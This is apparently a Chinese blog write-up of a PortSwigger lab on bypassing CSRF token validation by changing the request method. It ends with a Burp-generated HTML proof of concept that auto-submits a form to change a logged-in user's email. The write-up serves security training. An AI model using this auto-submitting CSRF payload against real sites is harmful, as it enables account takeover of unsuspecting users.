burpsuite靶场----CSRF----token验证取决于请求方法

burpsuite靶场----CSRF----无防御

靶场地址

https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method

正式开始

1.登录

2.抓包,发现有一段token

3.尝试删掉token,发现不行

4.尝试改变请求方式


发现也能实现功能

然后再把token参数删掉,也能实现

5.制作poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a990086031a78b8b8852db2002800f2.web-security-academy.net/my-account/change-email">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
   <script>document.forms[0].submit();</script>
  </body>
</html>

6.提交

posted @ 2023-10-13 09:30  BattleofZhongDinghe  阅读(95)  评论(0编辑  收藏  举报